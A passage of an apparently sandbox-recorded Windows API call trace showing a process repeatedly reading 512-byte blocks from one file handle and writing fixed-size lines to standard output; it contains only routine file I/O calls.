(hFile=0x4c) returned 0x1 [0094.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.254] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.255] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.255] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] GetFileType (hFile=0x4c) returned 0x1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.255] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, 
lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.256] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.256] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] GetFileType (hFile=0x4c) returned 0x1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.256] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: 
hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.257] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.257] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.257] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.257] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.257] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.258] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.258] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.258] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, 
lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.259] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.259] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] GetFileType (hFile=0x4c) returned 0x1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.259] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.259] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 
0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.260] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.260] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] GetFileType (hFile=0x4c) returned 0x1 [0094.260] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.260] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) 
returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.261] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.261] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] GetFileType (hFile=0x4c) returned 0x1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.261] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.261] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] GetFileType (hFile=0x4c) returned 0x1 [0094.262] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.262] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, 
